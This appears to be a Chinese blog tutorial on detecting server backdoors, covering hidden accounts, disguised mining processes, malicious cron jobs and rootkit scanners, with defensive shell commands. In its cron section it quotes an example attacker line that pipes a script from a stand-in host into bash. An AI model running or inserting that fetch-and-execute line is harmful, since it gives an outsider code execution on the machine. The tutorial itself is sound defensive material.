****

“我的服务器怎么突然在半夜狂挖比特币？！”——某倒霉运维的凌晨3点朋友圈。

后门（Backdoor）就像服务器的“狗洞”，黑客溜进来偷数据、装木马、甚至把你的机器当“矿工”。今天咱就用轻松+专业的方式，手把手教你揪出这些“老六”！

一、后门是什么？先搞懂敌人长啥样

后门不一定是“门”，可能是：

- 隐藏账号：比如黑客偷偷建个叫`mysql_backup`的管理员（你以为这是备份账号？太天真了）。

- 恶意进程：比如`/tmp/.systemd-service`这种伪装成系统服务的挖矿程序（名字越正经，问题越大）。

- 定时任务：比如每小时从境外IP下载脚本的Cron Job（你的服务器在给黑客打工）。

举个栗子🌰：

某粉丝的服务器CPU飙到100%，一查发现有个进程叫`nginx_help`，实际是门罗币矿工……（黑客起名套路深啊！）

二、5个硬核检测技巧（附实操命令）

1. 用户和权限大扫除：查“内鬼”账号

命令三连击：

```bash

cat /etc/passwd | grep -v "nologin"

检查可登录用户

awk -F: '($3 == 0)' /etc/passwd

查所有UID=0的root权限账号

lastlog | grep -v "Never logged in"

看谁最近登录过

```

重点排查：

- 陌生用户名：比如`oracle`（你没装数据库却有个oracle账号？离谱！）

- UID异常：普通用户UID本该是1000+，如果有个UID=0的`backup`用户……快跑！

2. 进程和端口钓鱼执法：抓“潜伏者”

命令组合拳：

top -c

看CPU占用高的进程（挖矿程序最爱刷存在感）

netstat -tulnp

查异常端口（比如6666、23333这种欢乐端口）

lsof -i :22

看谁在蹭你的SSH端口

经典案例📌：

某网友发现服务器总在深夜连接一个俄罗斯IP，一查是`/usr/bin/.sshd`伪装的SSH后门（正版叫`/usr/sbin/sshd`，多一个字母都是心机！）

3. 文件系统“找不同”：揪出伪装者

黑客最爱藏在这些路径：

- `/tmp/`、`/dev/shm/`（临时文件夹易被忽略）

- `/lib/.lib64/`（假装自己是系统库）

神器命令：

find / -type f -mtime -3

找3天内被修改的文件

rpm -Va

RedHat系校验文件完整性（被篡改的文件会标出）

⚠️ 注意： 如果发现`/bin/ls`被动了手脚……恭喜你，连基础命令都不安全了！（此时请用BusyBox急救）

4. Cron Job侦探时刻：查定时任务“间谍”

黑客的定时任务长这样👇：

*/30 * * * * curl http://hacker.com/x.sh | bash

排查命令：

crontab -l

查看当前用户的计划任务

ls -la /etc/cron.*

检查系统级任务目录

5. Rootkit降维打击：上专业工具！

如果以上都查不出问题……可能是高级Rootkit作祟。这时候请祭出神器：

- chkrootkit/rkhunter: 专杀Rootkit工具包

- Lynis: 全系统安全扫描工具

安装&使用示例：

sudo apt install rkhunter

Debian系安装

sudo rkhunter --checkall

开始扫描，喝杯咖啡等结果吧！

```

三、防后门终极奥义：3条保命原则

1. 最小权限原则: MySQL别用root跑！该降权的降权。

2. 日志监控: `journalctl -xe --since "1 hour ago"` （闲时多看日志，出事少背锅）。

3. 定期更新: `yum update -y && reboot` （别偷懒，漏洞都是懒出来的）。

****

查后门就像在服务器里玩《大家来找茬》，黑客再狡猾也会留痕迹。记住：“CPU突然高，必定有蹊跷；陌生进程跑，赶紧杀得了！”

下次遇到可疑情况，不妨按本文挨个排查。如果还搞不定……评论区喊我，老司机带你飙车！ 🚀

TAG:如何查服务器有什么后门,如何查服务器有什么后门设备,服务器后门怎么排查,如何查服务器有什么后门的